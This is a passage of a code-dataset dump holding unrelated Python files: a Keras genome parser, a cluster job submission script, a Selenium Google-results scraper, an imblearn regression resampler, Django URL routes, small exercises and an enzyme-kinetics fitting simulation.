\"\"\"","sub_path":"analyzer/category_based.py","file_name":"category_based.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"322984477","text":"import matplotlib.pyplot as plt\nimport itertools\nimport tensorflow as tf\n\nimport pandas as pd\nfrom scipy import io\nimport numpy as np\nfrom keras.utils import np_utils\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nfrom keras.metrics import binary_accuracy\n\nfrom keras import optimizers\nfrom keras.preprocessing.image import ImageDataGenerator\n\nfrom keras_sequential_ascii import sequential_model_to_ascii_printout\n\n# Keras layers\nfrom keras.models import Sequential\nfrom keras.models import load_model\nfrom keras.layers import Dense, Conv2D, Conv1D, MaxPool2D, Flatten\nfrom keras.layers import Dropout, BatchNormalization\n\nimport time\n\nimport sys, string, os, getopt\nimport ctypes as ctypes\n\nimport gc\n\nclass layer_genes_s():\n\n\tnum_layer_genes = 17;\n\n\tdef __init__(self, num_variables = None, layer_genes = None):\n\n\t\tself.layer_genes = layer_genes\n\n\t\tif (not self.testVariableCount(num_variables)):\n\t\t\tprint(\"Error! 
Class model layer does not have the correct number of variables, exiting!\")\n\t\t\texit(1)\n\t\telse:\n\n\t\t\tself.layer_active = self.layer_genes[ 0]\n\t\t\tself.layer_type = self.layer_genes[ 1]\n\n\t\t\tself.activation_present = self.layer_genes[ 2]\n\t\t\tself.activation_function = self.layer_genes[ 3]\n\n\t\t\tself.num_dense_ans = self.layer_genes[ 4]\n\n\t\t\tself.num_kernals = self.layer_genes[ 5]\n\t\t\tself.kernal_size_x = self.layer_genes[ 6]\n\t\t\tself.kernal_size_y = self.layer_genes[ 7]\n\t\t\tself.kernal_stride = self.layer_genes[ 8]\n\t\t\tself.kernal_dilation = self.layer_genes[ 9]\n\n\t\t\tself.pool_present = self.layer_genes[10]\n\t\t\tself.pool_type = self.layer_genes[11]\n\t\t\tself.pool_size = self.layer_genes[12]\n\t\t\tself.pool_stride = self.layer_genes[13]\n\n\t\t\tself.batch_norm_present = self.layer_genes[14]\n\t\t\tself.dropout_present = self.layer_genes[15]\n\t\t\tself.dropout_value = self.layer_genes[16]\n\n\tdef testVariableCount(self, num_variables):\n\t\treturn_value = 0\n\n\t\tif (num_variables == len(self.layer_genes)):\n\t\t\treturn_value = 1\n\n\t\treturn return_value\n\nclass genome_s():\n\n\tdef __init__(self, genome = None):\n\n\t\tself.genome = genome\n\n\t\tself.num_genes = self.genome[0 ]\n\t\tself.num_base_genes = self.genome[1 ]\n\t\tself.num_variables = self.genome[2 ]\n\t\tself.num_layers = self.genome[3 ]\n\n\t\tself.input_vector_num_dimensions = self.genome[4 ]\n\t\tself.input_vector_x_dimensions = self.genome[5 ]\n\t\tself.input_vector_y_dimensions = self.genome[6 ]\n\t\tself.input_vector_z_dimensions = self.genome[7 ]\n\t\tself.output_vector_size = self.genome[8 ]\n\n\t\tself.optimizer_type = self.genome[9 ]\n\t\tself.learning_rate = self.genome[10]\n\t\tself.batch_size = self.genome[11]\n\n\t\tself.num_epochs = self.genome[12]\n\t\tself.num_semesters = self.genome[13]\n\t\tself.num_generations = self.genome[14]\n\n\t\tself.layer_genes = []\n\n\t\tfor layer_idx in range(self.num_layers):\n\n\t\t\tgene_index_start = (layer_idx*self.num_variables) + self.num_base_genes\n\t\t\tgene_index_end = gene_index_start + self.num_variables\n\n\t\t\tlayer_genes = self.genome[gene_index_start:gene_index_end]\n\n\t\t\t# collect the parsed genes of every layer, one entry per layer\n\t\t\tself.layer_genes.append(layer_genes_s(num_variables = self.num_variables, layer_genes = layer_genes))\n\n\n\ndef constructModel(genome):\n\n\t#Base Genes:\n\n\tprint('Python Loaded.')\n\n\tgenome = genome_s(genome = genome)\n\n\tprint('Complete.')\n\n","sub_path":"model_generator.py","file_name":"model_generator.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"528807443","text":"import os\nimport shutil\nimport subprocess\nimport sys\n\nfrom cluster.latex_utils import SectionFromJsonHook\nfrom pathlib2 import Path\n\nfrom cluster import cluster_run, execute_submission, update_params_from_cmdline\nfrom cluster.report import produce_basic_report, init_plotting\nfrom cluster.utils import mkdtemp\n\n\ndef find_virtualenv_path():\n proc = subprocess.Popen(\"pipenv --venv\", shell=True, stdout=subprocess.PIPE)\n output = proc.communicate()[0].rstrip().decode(\"utf-8\")\n return os.path.abspath(output)\n\n\nparams = update_params_from_cmdline(verbose=False)\n\njson_full_name = os.path.abspath(sys.argv[1])\n\ninit_plotting()\n\nvirtual_env_path = find_virtualenv_path()\n\nhome = str(Path.home())\nmain_path = mkdtemp(suffix=params.optimization_procedure_name + \"-\" + \"project\")\nresults_path = os.path.join(home, 
params.results_dir, params.optimization_procedure_name)\njobs_path = mkdtemp(suffix=params.optimization_procedure_name + \"-\" + \"jobs\")\n\ngit_params = dict(\n url=\"git@github.com:a-paulus/exercise2RL.git\", local_path=main_path, **params.git_params\n)\n\nbase_paths_and_files = dict(\n script_to_run=os.path.join(main_path, \"train_racing_cluster.py\"),\n result_dir=results_path,\n jobs_dir=jobs_path,\n virtual_env_path=virtual_env_path,\n)\n\nhyperparam_dict = {hyperparam['name']: hyperparam['values'] for hyperparam in params.hyperparam_list}\n\ndef find_json(df, path_to_results, filename_generator):\n return json_full_name\n\n\njson_hook = SectionFromJsonHook(section_title=\"Optimization setting script\", section_generator=find_json)\n\n\nall_args = dict(submission_name=params.optimization_procedure_name,\n paths=base_paths_and_files,\n submission_requirements=params.cluster_requirements,\n hyperparam_dict=hyperparam_dict,\n other_params=params.fixed_params,\n samples=None,\n restarts_per_setting=params.restarts,\n smart_naming=True,\n git_params=git_params\n )\n\nsubmission = cluster_run(**all_args)\n\ndf, all_params, metrics, submission_hook_stats = execute_submission(submission, base_paths_and_files['result_dir'],\n min_fraction_to_finish=0.0)\ndf.to_csv(os.path.join(base_paths_and_files['result_dir'], 'results_raw.csv'))\n\nrelevant_params = list(hyperparam_dict.keys())\noutput_pdf = os.path.join(base_paths_and_files['result_dir'], f'{params.optimization_procedure_name}_report.pdf')\nproduce_basic_report(df, relevant_params, metrics, submission_hook_stats=submission_hook_stats,\n procedure_name=params.optimization_procedure_name, output_file=output_pdf)\n\n# copy this script to the result dir\nmy_path = os.path.realpath(__file__)\nshutil.copy(my_path, base_paths_and_files['result_dir'])","sub_path":"run_restarts.py","file_name":"run_restarts.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"201374683","text":"from functools import wraps\nimport numpy as np\nimport time\n\n\ndef measure(iterations: int):\n \"\"\"\n wrapper for taking care of the arguments\n \"\"\"\n\n def decorator(f):\n \"\"\"\n actual decorator\n \"\"\"\n f.t = dict()\n f.tp = dict()\n f.num = 0\n\n @wraps(f)\n def wrapper(*args, **kwargs):\n \"\"\"\n wrapper of the decorator\n \"\"\"\n t = time.time()\n tp = time.perf_counter()\n for i in range(iterations):\n r = f(*args, **kwargs)\n f.tp[f.num] = time.perf_counter() - tp\n f.t[f.num] = time.time() - t\n f.num += 1\n return r\n\n return wrapper\n\n return decorator\n\n\n@measure(100)\ndef np_set_difference(a, b):\n return np.setdiff1d(a, b)\n\n\n@measure(100)\ndef set_diff(a: set, b: set):\n return a.difference(b)\n\n\nnp_inputs_a = [np.unique(np.random.randint(0, high=i*2, size=i)).astype(np.uint32) for i in [100, 1000, 10000, 100000]]\nnp_inputs_b = [np.unique(np.random.randint(0, high=i*2, size=i)).astype(np.uint32) for i in [100, 1000, 10000, 100000]]\nset_inputs_a = [set(e) for e in np_inputs_a]\nset_inputs_b = [set(e) for e in np_inputs_b]\n\nfor fnp, fpy in zip([np_set_difference],\n [set_diff]):\n for inpa, inpb, ipya, ipyb in zip(np_inputs_a, np_inputs_b, set_inputs_a, set_inputs_b):\n fnp(inpa, inpb)\n fpy(ipya, ipyb)\n\n print(\"\")\n print(\"{0: <20} |{1: >21}\".format(fnp.__name__, fpy.__name__))\n for idx, data in enumerate(zip(fnp.t.values(), fnp.tp.values(), fpy.t.values(), fpy.tp.values())):\n t_np, tp_np, t_py, tp_py = data\n print(\"{0: <10.5f} 
{1: <10.5f}|{2:>10.5f} {3:>10.5f}\".format(t_np, tp_np, t_py, tp_py))\n\n","sub_path":"custom_timeit.py","file_name":"custom_timeit.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"478769351","text":"from selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import NoSuchElementException\nimport re\n\n\ndef is_exist_by_id(driver, _id):\n try:\n driver.find_element_by_id(_id)\n except NoSuchElementException:\n return False\n return True\n\n\ndef get_google_search_results_link(query, filter_keywords=\"\", max_page=3):\n links = []\n driver = webdriver.Chrome(ChromeDriverManager().install()) # automatically downloads appropriate chromedriver\n driver.get(\"https://www.google.com/search?q=\" + query.replace(\" \", \"+\"))\n repeat_time = 0\n filter_keywords = [keyword.strip() for keyword in filter_keywords.split(',')]\n while True:\n context_element = driver.find_element_by_id(\"rso\")\n elements = context_element.find_elements_by_class_name(\"g\")\n for element in elements:\n element_link = element.find_element_by_tag_name(\"a\").get_attribute(\"href\")\n for keyword in filter_keywords:\n if re.search(r\"%s\" % re.escape(keyword), element_link.lower()):\n # print(\"~~~~~~~~~~~~url '%s' contains keyword '%s'\" % (element_link, keyword))\n links.append(element_link)\n break\n # print(\"url '%s'\" % element_link)\n repeat_time += 1\n if repeat_time == max_page or not is_exist_by_id(driver, \"pnnext\"):\n break\n driver.find_element_by_id(\"pnnext\").click()\n WebDriverWait(driver, 20).until(\n lambda browser: browser.execute_script(\"return document.readyState;\") == \"complete\")\n driver.quit()\n return links\n\n\nif __name__ == \"__main__\":\n get_google_search_results_link(\"pilkada kompas.com 2020\", \"\", 5)\n","sub_path":"src/selenium/google_scraper.py","file_name":"google_scraper.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"276779569","text":"class resampler:\r\n def __init__(self):\r\n import pandas as pd\r\n from sklearn.preprocessing import LabelEncoder\r\n from collections import Counter\r\n import numpy as np\r\n self.bins = 3\r\n self.pd = pd\r\n self.LabelEncoder = LabelEncoder\r\n self.Counter = Counter\r\n self.X = 0\r\n self.Y_classes = 0\r\n self.target = 0\r\n self.np = np\r\n\r\n # This function adds classes to each sample and returns an augmented dataframe/numpy matrix\r\n def fit(self, X, target, bins=3, balanced_binning=False):\r\n self.bins = bins\r\n tmp = target\r\n \r\n # If data is numpy, then convert it into pandas\r\n if type(target) == int:\r\n if target == -1:\r\n target = X.shape[1]-1\r\n tmp = target\r\n self.X = self.pd.DataFrame()\r\n for i in range(X.shape[1]):\r\n if i!=target:\r\n self.X[str(i)] = X[:,i]\r\n self.X[\"target\"] = X[:,target]\r\n target = \"target\"\r\n else:\r\n self.X = X.copy()\r\n \r\n # Use qcut if balanced binning is required\r\n if balanced_binning:\r\n self.Y_classes = self.pd.qcut(self.X[target], q=self.bins, precision=0)\r\n else:\r\n self.Y_classes = self.pd.cut(self.X[target], bins=self.bins)\r\n \r\n # Pandas outputs ranges after binning. 
Convert ranges to classes\r\n le = self.LabelEncoder()\r\n self.Y_classes = le.fit_transform(self.Y_classes)\r\n \r\n # Pretty print\r\n print(\"Class Distribution:\\n-------------------\")\r\n classes_count = list(map(list, self.Counter(self.Y_classes).items()))\r\n classes_count = sorted(classes_count, key = lambda x: x[0])\r\n for class_, count in classes_count:\r\n print(str(class_)+\": \"+str(count))\r\n \r\n # Finally concatenate and return as dataframe or numpy\r\n # Based on what type of target was sent\r\n self.X[\"classes\"] = self.Y_classes\r\n if type(tmp) == int:\r\n self.target = tmp\r\n return self.X.values\r\n else:\r\n self.target = target\r\n return self.X\r\n \r\n # This function performs the re-sampling\r\n # It also merges classes as and when required\r\n def resample(self, sampler_obj):\r\n # If classes haven't yet been created, then run the \"fit\" function\r\n if type(self.Y_classes) == int:\r\n print(\"Error! Run fit method first!!\")\r\n return None\r\n\r\n # These are the imblearn parameters that require certain number of samples\r\n # So we need to merge classes having samples less than the value of these hyper-parameters\r\n k_nbs, n_nbs, m_nbs, n_nbs_v3 = 0, 0, 0, 0\r\n params = sampler_obj.get_params()\r\n \r\n if \"k_neighbors\" in params:\r\n k_nbs = params[\"k_neighbors\"]\r\n if \"n_neighbors\" in params:\r\n n_nbs = params[\"n_neighbors\"]\r\n if \"n_neighbors_ver3\" in params:\r\n n_nbs_v3 = params[\"n_neighbors_ver3\"]\r\n if \"m_neighbors\" in params:\r\n m_nbs = params[\"m_neighbors\"]\r\n if \"smote__k_neighbors\" in params:\r\n k_nbs = params[\"smote__k_neighbors\"]\r\n\r\n # Choose the max value\r\n nbs = max([k_nbs, n_nbs, m_nbs, n_nbs_v3])\r\n\r\n # Merge classes if number of neighbours is more than the number of samples\r\n if nbs > 0:\r\n classes_count = list(map(list, self.Counter(self.Y_classes).items()))\r\n classes_count = sorted(classes_count, key = lambda x: x[0])\r\n mid_point = len(classes_count)//2\r\n # Logic for merging\r\n for i in range(len(classes_count)):\r\n if i <= mid_point:\r\n if classes_count[i][1] <= nbs:\r\n self.Y_classes[self.np.where(self.Y_classes == classes_count[i][0])[0]] = classes_count[i+1][0]\r\n print(\"Warning: Class \" + str(classes_count[i][0]) + \" has been merged into Class \" + str(classes_count[i+1][0]) + \" due to low number of samples\")\r\n classes_count[i][0] = classes_count[i+1][0]\r\n else:\r\n if classes_count[i][1] <= nbs:\r\n self.Y_classes[self.np.where(self.Y_classes == classes_count[i][0])[0]] = classes_count[i-1][0]\r\n print(\"Warning: Class \" + str(classes_count[i][0]) + \" has been merged into Class \" + str(classes_count[i-1][0]) + \" due to low number of samples\")\r\n classes_count[i][0] = classes_count[i-1][0]\r\n\r\n # Finally, perform the re-sampling\r\n resampled_data, _ = sampler_obj.fit_resample(self.X, self.Y_classes)\r\n # Drop the extra class\r\n resampled_data.drop([\"classes\"], axis=1, inplace=True)\r\n # Return the correct type\r\n if type(self.target) == int:\r\n return resampled_data.values\r\n else:\r\n return resampled_data\r\n","sub_path":"Regression_ReSampling-master/src/reg_resampler.py","file_name":"reg_resampler.py","file_ext":"py","file_size_in_byte":5024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"207323720","text":"from django.urls import path\nfrom . 
import views\n\n\napp_name = 'posts'\n\nurlpatterns = [\n\n    #posts_page : post_list\n    path('', views.Posts.as_view(), name='posts'),\n    path('<int:pk>/', views.PostDetail.as_view(), name='post_detail'),\n\n    \n    #weather_vote\n    path('<int:pk>/sunny/', views.SunnyVote.as_view(), name='Sunny'),\n    path('<int:pk>/-sunny/', views.SunnyCancel.as_view(), name='-Sunny'),\n    path('<int:pk>/cloudy/', views.CloudyVote.as_view(), name='Cloudy'),\n    path('<int:pk>/-cloudy/', views.CloudyCancel.as_view(), name='-Cloudy'),\n    path('<int:pk>/rainy/', views.RainyVote.as_view(), name='Rainy'),\n    path('<int:pk>/-rainy/', views.RainyCancel.as_view(), name='-Rainy'),\n    \n    #comment\n    path('<int:pk>/comments/', views.CommentOnPost.as_view(), name='comment_post'),\n    path('comments/<int:pk>/', views.CommentDelete.as_view(), name='comment_delete'),\n    path('<int:post_pk>/comments/<int:comment_pk>/', views.ModerateComments.as_view(), name='moderate_comments'),\n    path('comments/<int:pk>/likes/', views.LikeComment.as_view(), name='like_comment'),\n    path('comments/<int:pk>/unlikes/', views.UnlikeComment.as_view(), name='unlike_comment'),\n\n\n    #Search\n    path('search/', views.Search.as_view(), name='search'),\n\n\n]","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"399642647","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\nfrom slimcut import utils\n\nfrom . import SyllableBaseModel\nclass Model(SyllableBaseModel):\n    def __init__(self, data_config, model_config=\"emb:32|l1:64\"):\n        super(Model, self).__init__()\n        \n        window_size = data_config['window_size']\n        no_vocabs = data_config['num_tokens']\n\n        config = utils.parse_model_params(model_config)\n        emb_dim = config['emb']\n        l1 = config['l1']\n\n        self.embeddings = nn.Embedding(\n            no_vocabs,\n            emb_dim,\n            padding_idx=0\n        )\n\n        self.linear1 = nn.Linear((2*window_size+1)*emb_dim, l1)\n        self.linear2 = nn.Linear(l1, 1)\n\n        self.model_params = model_config\n\n    def forward(self, inputs):\n        embeds = self.embeddings(inputs).view(inputs.size()[0], -1)\n        out = F.relu(self.linear1(embeds))\n        out = self.linear2(out)\n        return out","sub_path":"attacut/models/old_models/simple_nn.py","file_name":"simple_nn.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"455522823","text":"'''\nTime Complexity: O(n)\nSpace Complexity: O(n)\nDid this code successfully run on Leetcode : Yes\nExplanation: Traverse the tree down to the leaf nodes, building up the number digit by digit along the way.\nOnce you reach a leaf node, add the completed number to the variable sum. 
Do this for left and right, return sum\n'''\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def __init__(self):\n self.sum = 0\n\n def helper(self, root: TreeNode, sum1: int, val: int) -> int:\n if root == None:\n self.sum = self.sum + 0\n return\n\n if root.left == None and root.right == None:\n self.sum = self.sum + ((val * 10) + root.val)\n else:\n self.helper(root.left, self.sum, (val * 10) + root.val)\n self.helper(root.right, self.sum, (val * 10) + root.val)\n\n def sumNumbers(self, root: TreeNode) -> int:\n result = 0\n self.helper(root, result, 0)\n return self.sum\n","sub_path":"problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"495551784","text":"# Copyright 2014, UFCG/Analytics\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nclass RecommendationUpgrade:\n\n def __init__(self, host,\n cpu_total, cpu_usage,\n cpu_p, mem_total,\n mem_usage, mem_p,\n disk_total, disk_usage,\n disk_p):\n self.host = host\n self.cpu_total = cpu_total\n self.cpu_usage = cpu_usage\n self.cpu_percentage = cpu_p\n self.memory_total = mem_total\n self.memory_usage = mem_usage\n self.memory_percentage = mem_p\n self.disk_total = disk_total\n self.disk_usage = disk_usage\n self.disk_percentage = disk_p\n\n\nclass AlarmsList:\n\n def __init__(self, alarm_id, alarm_name, enabled, description):\n self.alarm_id = alarm_id\n self.alarm_name = alarm_name\n self.enabled = enabled\n self.description = description\n\n\nclass AlarmsHistory:\n\n def __init__(self, timestamp, alarm_name, resource_id, detail):\n self.timestamp = timestamp\n self.alarm_name = alarm_name\n self.resource_id = resource_id\n self.detail = detail\n\n\nclass RecommendationFlavors:\n\n def __init__(self, name, sugestion, lose, violations):\n self.name = name\n self.sugestion = sugestion\n self.lose = lose\n self.violations = violations\n\n\nclass RecommendationPowerStatus:\n\n def __init__(self, host, status):\n self.host = host\n self.status = status\n\n\nclass RecommendationMigration:\n\n def __init__(self, host, server, name, endhost, project):\n self.host = host\n self.server = server\n self.name = name\n self.endhost = endhost\n self.project = project\n\n\nclass BenchmarkDisk:\n\n def __init__(self, host, avg,\n median, min, max,\n first, second, third, fourth):\n self.host = host\n self.avg = avg\n self.median = median\n self.min = min\n self.max = max\n self.first = first\n self.second = second\n self.third = third\n self.fourth = fourth\n\n\nclass BenchmarkCpu:\n\n def __init__(self, host, avg,\n median, min, max,\n first, second, third, fourth):\n self.host = host\n self.avg = avg\n self.median = median\n self.min = min\n self.max = max\n self.first = first\n self.second = second\n self.third = third\n self.fourth = fourth\n\n\nclass BenchmarkMemory:\n\n def __init__(self, host, avg,\n 
median, min, max,\n                 first, second, third, fourth):\n        self.host = host\n        self.avg = avg\n        self.median = median\n        self.min = min\n        self.max = max\n        self.first = first\n        self.second = second\n        self.third = third\n        self.fourth = fourth\n\n\nclass UserMessages:\n\n    def __init__(self, id, sender,\n                 subject, timestamp,\n                 message, read):\n        self.id = id\n        self.sender = sender\n        self.subject = subject\n        self.timestamp = timestamp\n        self.message = message\n        self.read = read\n\n\nclass HostMessages:\n\n    def __init__(self, id, zone):\n        self.id = id\n        self.zone = zone\n\n\nclass SentMessages:\n\n    def __init__(self, message_id, subject, sent_to, read):\n        self.message_id = message_id\n        self.subject = subject\n        self.sent_to = sent_to\n        self.read = read\n","sub_path":"telemetry_dashboard/api/telemetry.py","file_name":"telemetry.py","file_ext":"py","file_size_in_byte":3981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"340774697","text":"__author__ = 'hoo'\nimport matplotlib.pyplot as plt\nimport pandas as pd\ndf = pd.read_excel(\"first.xlsx\",\"Sheet1\")\nfig = plt.figure()\nax = fig.add_subplot(1,1,1)\nax.hist(df['Age'],bins = 7)\nplt.title(\"Age distribution\")\nplt.xlabel('Age')\nplt.ylabel('#Employee')\nplt.show()","sub_path":"twoFirst01/qtgui4/pydatavisual/visual001.py","file_name":"visual001.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"586413610","text":"# print, len, str, format, int, input, range, enumerate\n\na = 'Hello, global!'\ndef qualquer_coisa():\n    global a\n    a += ' Hmm...'\n    print(a)\n\nqualquer_coisa()\nprint(a)\n\nexit()\ndef square(n):\n    return n**2\n\ndef par_impar(n):\n    if n % 2 == 0:\n        print('even')\n    else:\n        print('odd')\n\nfor i in range(0, 10):\n    par_impar(i)\n\ndef reverse(i):\n    return i[::-1]\n\nletras = ['a', 'b', 'c', 'd', 'e']\nprint(reverse(letras))\n","sub_path":"funcoes.py","file_name":"funcoes.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"159903672","text":"import random\r\n\r\nshapes = {1 : \"rock\", 2 : \"paper\", 3 : \"scissors\"}\r\nwhile True:\r\n    You = int(input(\"Please input your number here and 1-rock 2-paper 3-scissors: \"))\r\n    if You in shapes:\r\n        break\r\n    print(\"Please input 1 or 2 or 3\") \r\nComputer = random.randint(1, 3)\r\nprint('The shapes of you is: ', shapes[You])\r\nprint('The shapes of computer is: ', shapes[Computer])\r\nif (You == 1) and (Computer == 3) or (You == 2) and (Computer == 1) or (You == 3) and (Computer == 2):\r\n    print(\"You are the winner!\")\r\nelif You == Computer:\r\n    print(\"You're tied to the computer\")\r\nelse:\r\n    print(\"Computer is the winner!\")","sub_path":"Python/JuSt MiNi GaMe/rock paper scissors.py","file_name":"rock paper scissors.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"532542629","text":"# Copyright: 2007-2013, Sebastian Billaudelle \n#            2010-2013, Kristoffer Kleine \n\n# This library is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as published by\n# the Free Software Foundation; either version 2.1 of the License, or\n# (at your option) any later version.\n\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\nfrom gi.repository import GObject as gobject, Gtk as gtk\nimport cairo\nimport time\nimport math\n\nCURVE_LINEAR = lambda x: x\nCURVE_SINE = lambda x: math.sin(math.pi / 2 * x)\n\nFRAMERATE = 30.0\n\n\nclass CompositeBin(gtk.Fixed):\n \"\"\" A subclass of `GtkFixed` enabling composition of child widgets to the parent widget. \"\"\"\n\n def __init__(self):\n\n self.alpha = 1\n self.children = []\n\n gtk.Fixed.__init__(self)\n\n self.connect('realize', self.realize_cb)\n\n\n def realize_cb(self, widget):\n self.get_parent().connect_after('draw', self.draw_cb)\n\n\n def draw_cb(self, widget, ctx):\n\n ctx.set_operator(cairo.OPERATOR_OVER)\n\n #ctx.rectangle(*event.area)\n ctx.clip()\n\n for child in self.children:\n alloc = child.get_allocation()\n ctx.move_to(alloc.x, alloc.y)\n #ctx.set_source_pixmap(child.window, alloc.x, alloc.y)\n ctx.paint()\n\n return False\n\n\n def add(self, child, x, y):\n \"\"\"\n Add a widget.\n\n :param child: A `GtkWidget` to add to the `CompositedBin`.\n \"\"\"\n\n self.children.append(child)\n child.connect('realize', self.child_realize_cb)\n self.put(child, x, y)\n\n\n def remove(self, child):\n\n gtk.Fixed.remove(self, child)\n self.children.remove(child)\n\n\n def child_realize_cb(self, widget):\n try:\n widget.window.set_composited(True)\n except:\n pass\n\n\n def raise_child(self, child):\n\n child.window.raise_()\n self.children.remove(child)\n self.children.insert(len(self.children), child)\n self.window.invalidate_rect(child.allocation, True)\n\n\nclass Timeline(gobject.GObject):\n\n __gtype_name__ = 'Timeline'\n __gsignals__ = {\n 'update': (gobject.SIGNAL_RUN_LAST, gobject.TYPE_NONE, (gobject.TYPE_FLOAT,)),\n 'completed': (gobject.SIGNAL_RUN_LAST, gobject.TYPE_NONE, ())\n }\n\n def __init__(self, duration, curve):\n\n gobject.GObject.__init__(self)\n\n self.duration = duration\n self.curve = curve\n\n self._states = []\n self._stopped = False\n\n\n def run(self):\n\n n_frames = (self.duration / 1000.0) * FRAMERATE\n\n while len(self._states) <= n_frames:\n self._states.append(self.curve(len(self._states) * (1.0 / n_frames)))\n self._states.reverse()\n\n gobject.timeout_add(int(self.duration / n_frames), self.update)\n\n\n def stop(self):\n self._stopped = True\n\n\n def update(self):\n \n if self._stopped:\n self.emit('completed')\n return False\n\n self.emit('update', self._states.pop())\n if len(self._states) == 0:\n self.emit('completed')\n return False\n return True\n","sub_path":"cream/gui/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"496164559","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 23 10:55:15 2018\n\n@author: botond\n\"\"\"\n\nfrom scipy.optimize import curve_fit\nimport numpy as np\nfrom scipy.special import lambertw\nimport matplotlib.pyplot as plt\nimport time\n\ndef S_test(t,S0,E0,kf,kr,kcat,t0):\n Km = (kr+kcat)/kf\n V = kcat * E0\n S = Km * np.real(lambertw(S0/(Km) * np.exp((S0-V*(t-t0))/(Km))))\n return S\n\ndef product_test(t,S0,E0,kf,kr,kcat,t0):\n if t < t0:\n return 0\n Km = (kr+kcat)/kf\n return abs((S0 - S_test(t,S0,E0,kf,kr,kcat,t0) - 
E0*S_test(t,S0,E0,kf,kr,kcat,t0)/(Km + S_test(t,S0,E0,kf,kr,kcat,t0)) * (1 - np.exp(-((Km + S_test(t,S0,E0,kf,kr,kcat,t0)) * kf * (t-t0))))))\n\ndef S(t,S0,Km,V,t0):\n S = Km * np.real(lambertw(S0/(Km) * np.exp((S0-V*(t-t0))/(Km))))\n return S\n\ndef product(t,Km,V,t0):\n return (S0 - S(t,S0,Km,V,t0))\n\n\n#parameters:\nS0=1000; E0=1; kf=0.01; kr=0.05; kcat=5; t0=-20\n\nstarttime = time.time()\n\nestimates = []\nnum = 1000\nnoisevalues = [0,5,10,25]\n\nKm = (kr + kcat)/kf\nV = E0*kcat\n\noripars = [S0, Km, V, t0] #original parameters for evaluation (in part 3)\n\nfor noise in noisevalues:\n for i in range(num):\n \n #setup t values:\n test_t = np.array([t for t in range(0,1200,20)])\n \n #setup P values:\n test_P = np.array([product_test(t,S0,E0,kf,kr,kcat,t0) for t in test_t])\n \n #add noise to P values:\n test_P = [np.random.normal(loc=p, scale = p**(1/2) * noise/100*3) for p in test_P]\n \n #fit:\n popt, pcov = curve_fit(product, test_t, test_P, bounds=([0,0,-80], [3*oripars[1],3*oripars[2],0]), method=\"trf\")\n \n #append external list\n estpars = [S0, popt[0], popt[1], popt[2]]\n estimates.append(estpars)\n\nelapsedtime = time.time()- starttime\nprint('\\n','elapsed time = ',float(format(elapsedtime,'.4f')),' s',sep='')\n\nestimates = np.array(estimates)\nparameterkeys = ['S0','Km','V','t0']\n#%%\n#figures by species\nfor j in [j for j in range(len(parameterkeys)) if j != 0]: #omit S0\n fig, axs = plt.subplots(2, 2)\n fig.suptitle(parameterkeys[j], fontsize=16)\n for i in range(len(noisevalues)):\n a = int(i/2)\n b = i%2\n \n avg = np.average(estimates[i*num+1:(i+1)*num+1,j])\n stddev = np.std(estimates[i*num+1:(i+1)*num+1,j], ddof=1)\n error = abs((oripars[j] - avg)/oripars[j]) * 100\n axs[a,b].annotate('original parameter: {0:.2f}\\naverage: {1:.2f}\\nstandard deviation: {2:.2f}\\nrelative error: {3:.2f}{4}'.format(oripars[j],avg,stddev,error, \"%\"), xy=(0.7,0.6), xycoords='axes fraction')\n 